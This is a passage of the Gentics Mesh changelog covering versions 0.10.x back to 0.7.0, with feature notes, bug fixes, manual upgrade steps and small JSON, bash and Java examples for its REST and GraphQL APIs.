The index settings can be used to define new link:https://www.elastic.co/guide/en/elasticsearch/reference/current/analysis-analyzers.html[analyzers] and link:https://www.elastic.co/guide/en/elasticsearch/reference/current/analysis-tokenizers.html[tokenizers] or other additional link:https://www.elastic.co/guide/en/elasticsearch/guide/current/_index_settings.html[index settings].
The specified settings will automatically be merged with a default set of settings.

Once a new analyzer has been defined it can be referenced by custom field mappings which can now be added to each field.
The specified field mapping will be added to the generated fields property of the mapping. You can read more about this topic in the link:https://www.elastic.co/guide/en/elasticsearch/reference/current/multi-fields.html[fields mapping documentation] of Elasticsearch.

[source,json]
----
{
  "name": "dummySchema",
  "displayField": "name",
  "elasticsearch": {
    "settings": {
      "number_of_shards": 1,
      "number_of_replicas": 0
    },
    "analysis": {
      "analyzer": {
        "suggest": {
          "tokenizer": "mesh_default_ngram_tokenizer",
          "char_filter": ["html_strip"],
          "filter": ["lowercase"]
        }
      }
    }
  },
  "fields": [
    {
      "name": "name",
      "label": "Name",
      "required": true,
      "type": "string",
      "elasticsearch": {
        "suggest": {
          "analyzer": "suggest",
          "type": "string"
        }
      }
    }
  ]
}
----

You can use the `POST {apiLatest}/utilities/validateSchema` endpoint to validate and inspect the effective index configuration.

icon:plus[] REST: The `POST {apiLatest}/utilities/validateSchema` and `POST {apiLatest}/utilities/validateMicroschema` endpoints can now be used to validate a schema/microschema JSON without actually storing it.
The validation response will also contain the generated Elasticsearch index configuration.

icon:plus[] GraphQL: Nodes can now be loaded in the context of a schema. This will return all nodes which use the schema.

icon:plus[] Search: The `{apiLatest}/rawSearch/..` and `{apiLatest}/:projectName/rawSearch/..` endpoints have been added. These can be used to invoke search requests which will return the raw Elasticsearch response JSON.
The needed indices will automatically be selected in order to only return the type specific documents. Read permissions on the documents will also be automatically checked.
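A hedged sketch of such a raw search request (the `nodes` type segment, hostname, token and query body are examples only):

[source,bash]
----
# Invoke a raw search across node indices; the unmodified Elasticsearch response JSON is returned.
curl -X POST "http://localhost:8080/api/v1/rawSearch/nodes" \
     -H "Authorization: Bearer $MESH_TOKEN" \
     -H "Content-Type: application/json" \
     -d '{"query": {"match_all": {}}}'
----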
icon:plus[] Search: Error information for failed Elasticsearch queries will now be added to the response.

icon:plus[] Webroot: The schema property `urlFields` can now be used to specify fields which contain webroot paths.
The webroot endpoint in turn will first try to find a node which specifies the requested path.
If no node could be found using the urlField values, the regular segment path will be used to locate the node.
This feature can be used to set custom urls or short urls for your nodes.

icon:check[] Performance: Optimized the binary download memory usage.

icon:check[] REST: Fixed a bug which prevented pages with more than 2000 items from being loaded.

== 0.10.4 (10.10.2017)

CAUTION: REST: The `availableLanguages` field now also contains the publish information of the languages of a node.

icon:check[] REST: Fixed a bug in the permission system. Permissions on microschemas will now correctly be updated when applying permissions recursively on projects.

icon:check[] REST: ETags will now be updated if the permission on the element changes.

icon:check[] Core: Various bugs within the schema / microschema migration code have been addressed and fixed.

icon:check[] Core: The search index handling has been updated. A differential synchronization will be run to update the new search index and thus the old index data can still be used.

icon:check[] Performance: Removing permissions has been optimized.

icon:plus[] UI: A new action was added to the node action context menu. It is now possible to unpublish nodes.

icon:plus[] UI: The Mesh UI was updated.

icon:plus[] Config: It is now possible to configure the host to which the Gentics Mesh HTTP server should bind via the `httpServer.host` setting in the `mesh.yml` file. The default is still 0.0.0.0 (all interfaces).

icon:plus[] REST: The `{apiLatest}/:projectName/releases/:releaseUuid/migrateSchemas` and `{apiLatest}/:projectName/releases/:releaseUuid/migrateMicroschemas` endpoints have been changed from `GET` to `POST`.

icon:plus[] REST: The `{apiLatest}/admin/reindex` and `{apiLatest}/admin/createMappings` endpoints have been changed from `GET` to `POST`.

icon:plus[] CLI: It is now possible to reset the admin password using the `-resetAdminPassword` command line argument.

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 5.0

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.29

== 0.10.3 (18.09.2017)

icon:plus[] Logging: The `logback.xml` default logging configuration file will now be placed in the `config` folder. The file can be used to customize the logging configuration.

icon:plus[] Configuration: It is now possible to set custom properties within the elasticsearch setting.

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.27

icon:plus[] REST: It is now possible to set and read permissions using paths which contain the project name. Example: `GET {apiLatest}/roles/:roleUuid/permissions/:projectName/...`

icon:check[] Search: A potential race condition has been fixed. This condition previously caused Elasticsearch to no longer accept any changes.

icon:check[] Performance: The REST API performance has been improved by optimizing the JSON generation process.
link:https://github.com/gentics/mesh/issues/141[#141]

== 0.10.2 (14.09.2017)

icon:book[] Documentation: The new link:{{< relref "security.asciidoc" >}}[security] and link:{{< relref "performance.asciidoc" >}}[performance] sections have been added to our documentation.

icon:plus[] The *Webroot-Response-Type* header can now be used to differentiate between webroot binary and node responses. The value of this header can either be *binary* or *node*.

icon:plus[] The `{apiLatest}/admin/status/migrations` endpoint was removed.
The status of a migration job can now be obtained via the `{apiLatest}/admin/jobs` endpoint. Successfully executed jobs will no longer be removed from the job list.

icon:plus[] The `{apiLatest}/:projectName/release/:releaseUuid/schemas` and `{apiLatest}/:projectName/release/:releaseUuid/microschemas` endpoints have been reworked.
The response format has been updated. The status and uuid of the job which has been invoked when the migration was started will now also be included in this response.

icon:check[] Java REST Client: A potential threading issue within the Java REST Client has been fixed. Vert.x http clients will no longer be shared across multiple threads.

icon:check[] Memory: Reduced the memory footprint of microschema migrations. link:https://github.com/gentics/mesh/issues/135[#135]

icon:check[] Fixed the handling of the "required" and "allow" properties of schema fields when adding fields to schemas.

== 0.10.1 (08.09.2017)

icon:plus[] Clustering: Added link:{{< relref "clustering.asciidoc" >}}#_node_discovery[documentation] and support for cluster configurations which use a list of static IP addresses instead of multicast discovery.

icon:plus[] Node Migration: The node migration performance has been increased.

icon:plus[] REST: Added new endpoints `{apiLatest}/admin/jobs` to list and check queued migration jobs. The new endpoints are described in the link:{{< relref "features.asciidoc" >}}#_executing_migrations[feature documentation].

icon:check[] Search: The `raw` field will no longer be added by default to the search index. Instead it can be added using the new `searchIndex.addRaw` flag within the schema field.
Please note that the raw field value in the search index will automatically be truncated to a size of 32KB. Otherwise the value can't be added to the search index.

icon:check[] Migration: Interrupted migrations will now automatically be started again after the server has been started. Failed migration jobs can be purged or reset via the `{apiLatest}/admin/jobs` endpoint.

icon:check[] Migration: Migrations will no longer fail if a required field was added. The field will be created and no value will be set. Custom migration scripts can still be used to add a custom default value during migration.

[source,json]
----
{
  "name": "name",
  "label": "Name",
  "required": true,
  "type": "string",
  "searchIndex": {
    "addRaw": true
  }
}
----

icon:check[] Java REST Client: Various missing request parameter implementations have been added to the mesh-rest-client module.

icon:check[] Node Migration: A bug has been fixed which prevented node migrations with more than 5000 elements from completing.

icon:check[] GraphQL: Updated the GraphiQL browser to the latest version to fix various issues when using aliases.

== 0.10.0 (04.09.2017)

CAUTION: Manual Change: Configuration changes. For already existing `mesh.yml` files, the `nodeName` setting has to be added. Choose any name for the mesh instance.
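A minimal sketch, assuming the `mesh.yml` file still sits next to the server binary before the move described below (the instance name is an example):

[source,bash]
----
# Append the new mandatory nodeName setting to an existing configuration.
echo 'nodeName: "mesh-node-1"' >> mesh.yml
----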
For already existing `mesh.yml` files, the `nodeName` setting has to be added. Choose any name for the mesh instance.\n\nCAUTION: Manual Change: Configuration changes. The `clusterMode` setting has been deprecated in favour of the new cluster configuration. This setting must be removed from the `mesh.yml` file.\n\n[CAUTION]\n=====================================================================\nManual Change: The configuration files `mesh.yml`, `keystore.jceks` must be moved to a `config` subfolder.\n\n[source,bash]\n----\nmkdir config\nmv mesh.yml config\nmv keystore.jceks config\n----\n=====================================================================\n\n[CAUTION]\n=====================================================================\nManual Change: The graph database folder needs to be moved. Please create the `storage` subfolder and move the existing data into that folder.\n\n[source,bash]\n----\nmkdir -p data\/graphdb\/storage\nmv data\/graphdb\/* data\/graphdb\/storage\/\n----\n=====================================================================\n\nicon:plus[] Clustering: This release introduces master-master clustering support. You can read more about clustering and the configuration in the link:{{< relref \"clustering.asciidoc\" >}}[clustering documentation].\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.26\n\nicon:plus[] REST: The `{apiLatest}\/admin\/consistency\/check` endpoint has been added. The endpoint can be used to verify the database integrity.\n\nicon:check[] Core: Fixed missing OrientDB roles and users for some older graph databases. Some graph databases did not create the needed OrientDB user and roles. These roles and users are needed for the OrientDB server and are different from Gentics Mesh users and roles.\n\nicon:check[] REST: Invalid date strings were not correctly handled. An error will now be thrown if a date string can't be parsed.\n\nicon:check[] REST: The delete handling has been updated.\n It is now possible to specify the `?recursive=true` parameter to recursively delete nodes.\n By default `?recursive=false` will be used. Deleting a node which contains children will thus cause an error.\n The behaviour of node language deletion has been updated as well. Deleting the last language of a node will also remove this node. This removal will again fail if no `?recursive=true` query parameter has been added.\n\n== 0.9.28 (28.08.2017)\n\nicon:check[] Core: The permission check system has been updated. Elements which require the `readPublished` permission can now also be read if the user has only the `read` permission. The `read` permission automatically also grants `readPublished`.\n\nicon:check[] Java REST Client: The classes `NodeResponse` and `MicronodeField` now correctly implement the interface `FieldContainer`.\n\nicon:check[] REST: The endpoint `{apiLatest}\/{projectName}\/nodes\/{nodeUuid}\/binary\/{fieldName}` did not correctly handle the read published nodes permission. This has been fixed now. link:https:\/\/github.com\/gentics\/mesh\/issues\/111[#111]\n\n== 0.9.27 (23.08.2017)\n\nicon:plus[] GraphQL: It is now possible to retrieve the unfiltered result count. This count is directly loaded from the search provider and may not match up with the exact filtered count.\n The advantage of this value is that it can be retrieved very fast.\n\nicon:plus[] Java REST Client: The client now also supports encrypted connections.\n\nicon:check[] REST: Invalid dates were not correctly handled. An error will now be thrown if a date string can't be parsed.\n\n
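For illustration only, a client-side sketch of producing the strict ISO-8601 date strings that these checks expect; the class and the validation flow are hypothetical and not part of the Gentics Mesh API:\n\n[source,java]\n----\nimport java.time.Instant;\nimport java.time.format.DateTimeFormatter;\nimport java.time.format.DateTimeParseException;\n\npublic class DateFieldValueSketch {\n public static void main(String[] args) {\n \/\/ Date fields expect ISO-8601 strings; ISO_INSTANT always emits UTC.\n String value = DateTimeFormatter.ISO_INSTANT.format(Instant.now());\n System.out.println(value); \/\/ e.g. 2017-08-23T10:15:30Z\n\n \/\/ Malformed strings are rejected by the server, so validating on the\n \/\/ client side avoids a failing request.\n try {\n Instant.parse(\"23.08.2017\"); \/\/ not ISO-8601\n } catch (DateTimeParseException e) {\n System.err.println(\"invalid date: \" + e.getMessage());\n }\n }\n}\n----\n\n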
icon:check[] GraphQL: Various errors which occurred when loading a schema of a node via GraphQL have been fixed now.\n\n== 0.9.26 (10.08.2017)\n\nicon:plus[] UI: Added CORS support. Previously CORS was not supported by the UI.\n\nicon:check[] REST API: Added missing allowed CORS headers which were needed to use the Gentics Mesh UI in a CORS environment.\n\nicon:check[] UI: Fixed translation action. Previously an error prevented translations from being executed.\n\nicon:check[] UI: Fixed image handling for binary fields. Previously only the default language image was displayed in the edit view. This has been fixed.\n\n== 0.9.25 (09.08.2017)\n\nicon:plus[] Demo: The demo dump extraction will now also work if an empty data directory exists. This is useful when providing a docker mount for the demo data.\n\nicon:plus[] GraphQL: The paging performance has been improved.\n\nicon:plus[] Core: Various missing permission checks have been added.\n\nicon:check[] Core: A bug in the schema changes apply code has been fixed. The bug previously prevented schema changes from being applied.\n\n== 0.9.24 (03.08.2017)\n\nicon:plus[] REST API: Added idempotency checks for various endpoints to prevent execution of superfluous operations. (e.g.: assign role to group, assign schema to project)\n\nicon:check[] Core: Fixed a bug which prevented micronodes from being transformed. SUP-4751\n\n== 0.9.23 (02.08.2017)\n\nicon:plus[] Rest-Client: It is now possible to configure the base uri for the rest client.\n\nicon:plus[] GraphQL: It is now possible to get the reference of all projects from schemas and microschemas.\n\nicon:check[] UI: Date fields now work with ISO 8601 strings rather than Unix timestamps.\n\nicon:check[] UI: Fixed bugs with lists of microschemas. (SUP-4712)\n\nicon:check[] UI: Fixed mouse clicks not working in lists in FF and (partially) in IE\/Edge. (SUP-4717)\n\nicon:check[] Core: The reindex performance has been increased and additional log output will be provided during reindex operations.\n\n== 0.9.22 (28.07.2017)\n\nicon:plus[] REST API: It is now possible to create nodes, users, groups, roles, releases and projects using a provided uuid.\n\nicon:check[] Versioning: A publish error which was caused by a bug in the node language deletion code has been fixed.\n\n== 0.9.21 (26.07.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.24\n\nicon:check[] Core: Fixed handling of ISO8601 dates which did not contain a UTC flag or a time offset value. Such dates could previously not be stored. Note that ISO8601 UTC dates will always be returned.\n\nicon:check[] GraphQL: URL handling of the GraphQL browser has been improved. Previously very long queries led to very long query parameters which could not be handled correctly. The query browser will now use the anchor part of the URL to store the query.\n\nicon:check[] Migration: The error handling within the schema migration code has been improved.\n\nicon:plus[] GraphQL: It is now possible to load the schema version of a node using the ```schema``` field.\n\nicon:check[] Versioning: Older Gentics Mesh instances (>0.8.x) were lacking some draft information. This information has been added now.\n\n== 0.9.20 (21.07.2017)\n\nicon:plus[] License: The license was changed to Apache License 2.0\n\nicon:plus[] Schema Versions: The schema version field type was changed from `number` to `string`. 
It is now also possible to load schema and microschema versions using the `?version` query parameter.\n\nicon:check[] Search: The error reporting for failing queries has been improved.\n\nicon:check[] Search: The total page count value has been fixed for queries which were using `?perPage=0`.\n\n== 0.9.19 (07.07.2017)\n\nicon:check[] UI: Fixed adding a node to a node list.\n\nicon:check[] Docs: Various endpoints were not included in the generated RAML. This has been fixed now.\n\n== 0.9.18 (30.06.2017)\n\nicon:plus[] Demo: Fixed demo data uuids.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.22\n\nicon:plus[] Core: The Ferma OGM library was updated to version 2.2.2\n\n== 0.9.17 (21.06.2017)\n\nicon:check[] UI: A bug which prevented micronodes which contained an empty node field from being saved was fixed.\n\nicon:check[] Core: Issues within the error reporting mechanism have been fixed.\n\nicon:plus[] Server: The Mesh UI was added to the mesh-server jar.\n\nicon:plus[] Core: The internal transaction handling has been refactored.\n\nicon:plus[] Core: The Vert.x core dependency was updated to version 3.4.2\n\nicon:plus[] API: The version fields of node responses and publish status responses are now strings instead of objects containing the version number.\n\n== 0.9.16 (19.06.2017)\n\nicon:book[] Documentation: Huge documentation update.\n\n== 0.9.15 (19.06.2017)\n\nicon:check[] GraphQL: Fixed loading tags for nodes.\n\n== 0.9.14 (09.06.2017)\n\nicon:check[] WebRoot: Bugs within the permission handling have been fixed. It is now possible to load nodes using only the *read_published* permission. This permission was previously ignored.\n\nicon:check[] GraphQL: An introspection bug which prevented graphiql browser auto completion from working correctly has been fixed. The bug did not occur on systems which already used microschemas.\n\n== 0.9.13 (08.06.2017)\n\nicon:check[] UI: The UI was updated. A file upload related bug was fixed.\n\nicon:check[] UI: Schema & Microschema description is no longer a required field.\n\n== 0.9.12 (08.06.2017)\n\nicon:check[] GraphQL: Fixed handling of node lists within micronodes.\n\nicon:check[] GraphQL: Fixed a \"Micronode type not found\" error.\n\nicon:check[] GraphQL: Fixed the GraphQL API for systems which do not contain any microschemas.\n\nicon:check[] GraphQL: Fixed permission handling and filtering when dealing with node children.\n\n== 0.9.11 (07.06.2017)\n\nicon:plus[] GraphQL: The GraphQL library was updated. Various GraphQL related issues have been fixed.\n\n== 0.9.10 (29.05.2017)\n\nicon:plus[] Schemas: The default content and folder schemas have been updated. The `fileName` and `folderName` fields have been renamed to `slug`. The `name` field was removed from the content schema and a `teaser` field has been added.\nThese changes are optional and thus not automatically applied to existing installations.\n\nicon:plus[] Demo: The `folderName` and `fileName` fields have been renamed to `slug`. This change only affects new demo installations.\n\n\nicon:check[] GraphQL: The language fallback handling was overhauled. The default language will no longer automatically be appended to the list of fallback languages. This means that loading nodes will only return nodes in those languages which have been specified by the `lang` argument.\n\nicon:check[] GraphQL: The `path` handling for nodes within node lists has been fixed. Previously it was not possible to retrieve the `path` and various other fields for those nodes.\n\n
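As a rough illustration of the now-working behaviour, a query sketch; the project name `demo`, a schema `content` with a node list field `related`, and the query shape are all assumptions, not taken from this changelog:\n\n[source,java]\n----\nimport java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\npublic class NodeListPathSketch {\n public static void main(String[] args) throws Exception {\n \/\/ Ask for the path of every node referenced by a node list field.\n String query = \"{ nodes { elements { fields { ... on content { related { path } } } } } }\";\n String body = \"{\\\"query\\\":\\\"\" + query + \"\\\"}\";\n\n HttpRequest request = HttpRequest.newBuilder()\n .uri(URI.create(\"http:\/\/localhost:8080\/api\/v1\/demo\/graphql\"))\n .header(\"Content-Type\", \"application\/json\")\n .POST(HttpRequest.BodyPublishers.ofString(body))\n .build();\n\n HttpResponse<String> response = HttpClient.newHttpClient()\n .send(request, HttpResponse.BodyHandlers.ofString());\n System.out.println(response.body());\n }\n}\n----\n\n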
== 0.9.9 (19.05.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.20.\n\nicon:plus[] API: The following endpoints were moved:\n\n * `{apiLatest}\/admin\/backup` \u27f6 `{apiLatest}\/admin\/graphdb\/backup`\n * `{apiLatest}\/admin\/export` \u27f6 `{apiLatest}\/admin\/graphdb\/export`\n * `{apiLatest}\/admin\/import` \u27f6 `{apiLatest}\/admin\/graphdb\/import`\n * `{apiLatest}\/admin\/restore` \u27f6 `{apiLatest}\/admin\/graphdb\/restore`\n\nicon:plus[] Core: Added `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateMicroschemas` endpoint which can be used to resume previously unfinished micronode migrations.\n\nicon:plus[] Performance: The startup performance has been increased when dealing with huge datasets.\n\nicon:plus[] Auth: The anonymous authentication mechanism can now also be disabled by setting the `Anonymous-Authentication: disable` header. This is useful for client applications which don't need or want anonymous authentication. The Gentics Mesh REST client has been enhanced accordingly.\n\nicon:plus[] Core: The read performance of node lists has been improved.\n\nicon:plus[] Core: The write performance of nodes has been improved.\n\nicon:plus[] Demo: The demo data has been updated. A folderName and a fileName field have been added to the demo schemas.\n\nicon:plus[] GraphQL: Added micronode list handling. Previously it was not possible to handle micronode list fields.\n\nicon:check[] Core: Fixed an NPE that was thrown when loading releases on older systems.\n\nicon:check[] Core: An upgrade error has been fixed which was caused by an invalid microschema JSON format error.\n\nicon:check[] UI: You will no longer be automatically logged in as the anonymous user once your session expires.\n\nicon:check[] Core: The language fallback handling for node breadcrumbs has been fixed. Previously the default language was not automatically added to the handled languages.\n\n== 0.9.8 (08.05.2017)\n\nicon:plus[] UI: Microschemas can now be assigned to projects.\n\nicon:plus[] UI: Descriptions can now be assigned to schemas & microschemas.\n\nicon:plus[] Core: A bug was fixed which prevented the node response `project` property from being populated.\n\nicon:plus[] Core: The redundant `isContainer` field was removed from the node response.\n\nicon:plus[] Core: Various bugs within node migrations have been fixed.\n\nicon:plus[] Core: The allow property for micronode schema fields will now correctly be handled.\n\nicon:plus[] Core: Microschemas will now be assigned to projects during a schema update. This only applies to microschemas which are referenced by the schema (e.g. via a micronode field).\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.19.\n\n== 0.9.7 (28.04.2017)\n\nicon:plus[] GraphQL: The nested `content` and `contents` fields have been removed. The properties of those fields have been merged with the `node` \/ `nodes` field.\n\nicon:plus[] GraphQL: The field names for paged result set metadata have been updated to better match up with the REST API fields.\n\nicon:plus[] GraphQL: A language can now be specified when loading node reference fields using the `lang` argument.\n\nicon:plus[] GraphQL: It is now possible to resolve links within loaded fields using the `linkType` field argument.\n\nicon:plus[] Auth: Support for anonymous access has been added to mesh. Requests which do not provide a `mesh.token` will automatically try to use the `anonymous` user. This user is identified by the username `anonymous` and thus no anonymous access support is provided if this user can't be located.\n\n
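A hypothetical sketch of both behaviours from a plain Java client; host and project name are placeholders, and only the endpoint style and the `Anonymous-Authentication: disable` header from the 0.9.9 notes above are taken from this changelog:\n\n[source,java]\n----\nimport java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\npublic class AnonymousAccessSketch {\n public static void main(String[] args) throws Exception {\n HttpClient client = HttpClient.newHttpClient();\n\n \/\/ No mesh.token is sent, so the request falls back to the anonymous user\n \/\/ (provided that a user with the username anonymous exists).\n HttpRequest fallback = HttpRequest.newBuilder()\n .uri(URI.create(\"http:\/\/localhost:8080\/api\/v1\/demo\/nodes\"))\n .GET()\n .build();\n System.out.println(client.send(fallback, HttpResponse.BodyHandlers.ofString()).statusCode());\n\n \/\/ Clients can opt out of the fallback via the header described above.\n HttpRequest noFallback = HttpRequest.newBuilder()\n .uri(URI.create(\"http:\/\/localhost:8080\/api\/v1\/demo\/nodes\"))\n .header(\"Anonymous-Authentication\", \"disable\")\n .GET()\n .build();\n System.out.println(client.send(noFallback, HttpResponse.BodyHandlers.ofString()).statusCode());\n }\n}\n----\n\n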
icon:plus[] GraphQL: It is now possible to retrieve the path for a content using the `path` field. The `Node.languagePaths` has been removed in favour of this new field.\n\nicon:plus[] Auth: It is now possible to issue API tokens via the `GET {apiLatest}\/users\/:userUuid\/token` endpoint. API tokens do not expire and work in conjunction with the regular JWT authentication mechanism. These tokens should only be used when SSL is enabled. The `DELETE {apiLatest}\/users\/:userUuid\/token` endpoint can be used to revoke the issued API token. Only one API token is supported per user. Generating a new API token will invalidate the previously issued token.\n\nicon:check[] GraphQL: An error was fixed which occurred when loading a node using a bogus uuid.\n\nicon:check[] Auth: An error which caused the keystore loading process to fail was fixed.\n\n== 0.9.6 (14.04.2017)\n\nicon:plus[] It is now possible to resume previously aborted schema migrations via the `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateSchemas` endpoint.\n\nicon:plus[] Auth: The Java keystore file will now automatically be created if none could be found. The keystore password will be taken from the `mesh.yml` file or randomly generated and stored in the config.\n\nicon:check[] Core: Migration errors will no longer cause a migration to be aborted. The migration will continue and log the errors. An incomplete migration can be resumed later on.\n\nicon:check[] Core: Fixed node migration search index handling. Previous migrations did not correctly update the index. An automatic reindex will be invoked during startup.\n\n== 0.9.5 (13.04.2017)\n\nicon:check[] Core: The schema check for duplicate field labels has been removed. The check previously caused schema updates to fail.\n\n== 0.9.4 (13.04.2017)\n\nicon:check[] UI: Fixed project creation.\n\nicon:check[] UI: Fixed error when attempting to translate a node.\n\nicon:check[] UI: Fixed incorrect search query.\n\nicon:check[] UI: An error is now displayed when attempting to publish a node with an unpublished ancestor.\n\nicon:check[] JWT: The `signatureSecret` property within the Gentics Mesh configuration has been renamed to `keystorePassword`.\n\nicon:plus[] JWT: It is now possible to configure the algorithm which is used to sign the JWT tokens.\n\nicon:plus[] Java: The Java model classes have been updated to provide fluent APIs.\n\nicon:plus[] Demo: It is now possible to access the elasticsearch head UI directly from mesh via http:\/\/localhost:8080\/elastichead - The UI will only be provided if the elasticsearch http ports are enabled. Only enable this for development since mesh will not protect the Elasticsearch HTTP server.\n\nicon:plus[] Core: Downgrade and upgrade checks have been added. It is no longer possible to run Gentics Mesh using a dump which contains data which was touched by a newer mesh version. 
Upgrading a snapshot version of Gentics Mesh to a release version can be performed under advisement.\n\n== 0.9.3 (10.04.2017)\n\nicon:check[] UI: A bug which prevented assigning created schemas to projects was fixed.\n\nicon:check[] A bug which could lead to concurrent requests failing was fixed.\n\nicon:check[] Error handling: A much more verbose error will be returned when creating a schema which lacks the type field for certain schema fields.\n\nicon:check[] GraphQL: A bug which led to incorrect column values for GraphQL errors was fixed.\n\nicon:plus[] The OrientDB dependency was updated to version 2.2.18.\n\nicon:plus[] GraphQL: The container\/s field was renamed to content\/s to ease usage.\n\nicon:plus[] GraphQL: It is no longer possible to resolve nodes using the provided webroot path. The path argument and the resolving were moved to the `content` field.\n\n== 0.9.2 (04.04.2017)\n\nicon:plus[] The `{apiLatest}\/admin\/backup`, `{apiLatest}\/admin\/restore`, `{apiLatest}\/admin\/import`, `{apiLatest}\/admin\/export` endpoints were added to the REST API. These endpoints allow the creation of backup dumps.\n\nicon:plus[] GraphQL: It is now possible to execute elasticsearch queries within the GraphQL query.\n\nicon:plus[] GraphQL: It is now possible to resolve a partial web root path using the `child` field of a node.\n\nicon:plus[] GraphQL: It is now possible to resolve information about the running mesh instance via GraphQL.\n\nicon:check[] Various issues with the linkType argument within the GraphQL API have been fixed.\n\nicon:check[] Fixed an NPE that occurred when loading a container for a language which did not exist.\n\n== 0.9.1 (28.03.2017)\n\nicon:check[] The `Access-Control-Allow-Credentials: true` header will now be returned when CORS support is enabled.\n\nicon:check[] A NullPointerException within the Java Rest Client was fixed.\n\nicon:check[] The AngularJS Demo was updated.\n\n== 0.9.0 (27.03.2017)\n\nicon:plus[] Gentics Mesh now supports GraphQL.\n\nicon:important[] The `expandAll` and `expand` parameters will be removed within an upcoming release of Gentics Mesh. We highly recommend using the GraphQL endpoint instead if you want to fetch deeply nested data.\n\nicon:plus[] Schema name validation - Schema and microschema names must only contain letters, numbers or underscores.\n\nicon:plus[] Node Tag Endpoint\n\nThe endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/tags` was enhanced. It is now possible to post a list of tag references which will be applied to the node. Tags which are not part of the list will be removed from the node. Tags which do not exist will be created. Please note that tag families will not automatically be created.\n\nThe `tags` field within the node response was updated accordingly.\n\n
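A sketch of such a tag update; the endpoint is the one named above, while the tag reference payload shape, host, project and uuid are assumptions:\n\n[source,java]\n----\nimport java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\npublic class NodeTagUpdateSketch {\n public static void main(String[] args) throws Exception {\n \/\/ The posted list becomes the complete tag set of the node: tags missing\n \/\/ from the list are removed, unknown tags are created.\n String tags = \"{\\\"tags\\\":[\"\n + \"{\\\"name\\\":\\\"red\\\",\\\"tagFamily\\\":\\\"colors\\\"},\"\n + \"{\\\"name\\\":\\\"blue\\\",\\\"tagFamily\\\":\\\"colors\\\"}]}\";\n\n String nodeUuid = \"replace-with-node-uuid\";\n HttpRequest request = HttpRequest.newBuilder()\n .uri(URI.create(\"http:\/\/localhost:8080\/api\/v1\/demo\/nodes\/\" + nodeUuid + \"\/tags\"))\n .header(\"Content-Type\", \"application\/json\")\n .POST(HttpRequest.BodyPublishers.ofString(tags))\n .build();\n\n HttpResponse<String> response = HttpClient.newHttpClient()\n .send(request, HttpResponse.BodyHandlers.ofString());\n System.out.println(response.statusCode());\n }\n}\n----\n\n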
== 0.8.3 (24.02.2017)\n\nicon:plus[] Tags are now also indexed in the node document in the field `tagFamilies`, grouped by tag families.\n\n== 0.8.2 (23.02.2017)\n\nicon:check[] The trigram filter configuration was updated so that all characters will be used to tokenize the content.\n\n== 0.8.1 (21.02.2017)\n\nicon:check[] A bug which prevented index creation in certain cases was fixed.\n\n== 0.8.0 (10.02.2017)\n\nicon:plus[] Names, string fields and html field values will now be indexed using the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/guide\/current\/ngrams-compound-words.html[trigram analyzer].\n\nicon:plus[] Binary Endpoint Overhaul\n\nThe field API endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/languages\/:language\/fields\/:field` was removed and replaced by the binary `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/binary` endpoint.\nThe binary endpoints are now also versioning aware and handle conflict detection. It is thus required to add the `language` and `version` form data parameters to the upload request.\n\nicon:plus[] Transform Endpoint Overhaul\n\nThe endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/languages\/:language\/fields\/:field\/transform` was renamed to `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/binaryTransform`.\nThe transform endpoint will now return the updated node.\n\nicon:plus[] The schemaReference property, which is no longer needed, was removed from node update requests.\n\nicon:plus[] The rootNodeUuid property within the project response was changed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n\u2026\n \"rootNodeUuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n\u2026\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n\u2026\n \"rootNode\": {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n },\n\u2026\n}\n----\n____\n\nicon:plus[] The parentNodeUuid property within node create requests was changed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n\u2026\n \"parentNodeUuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n\u2026\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n\u2026\n \"parentNode\": {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n },\n\u2026\n}\n----\n____\n\nicon:plus[] JSON Schema information has been added to the RAML API documentation. This information can now be used to generate REST model types for various programming languages.\n\nicon:plus[] The navigation response JSON was restructured. The root element was removed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n \"root\" : {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n \"node\" : {\u2026},\n \"children\" : [\u2026]\n }\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n \"node\" : {\u2026},\n \"children\" : [\u2026]\n}\n----\n____\n\n\n\n== 0.7.0 (19.01.2017)\n\nicon:bullhorn[] Content releases support\n\n[quote]\n____\nThis version of Gentics Mesh introduces _Content Releases_. A detailed description of this feature can be found in our https:\/\/getmesh.io\/docs[Documentation].\n____\n\nicon:bullhorn[] Versioning support\n\n[quote]\n____\nThis version of Gentics Mesh introduces versioning of contents. 
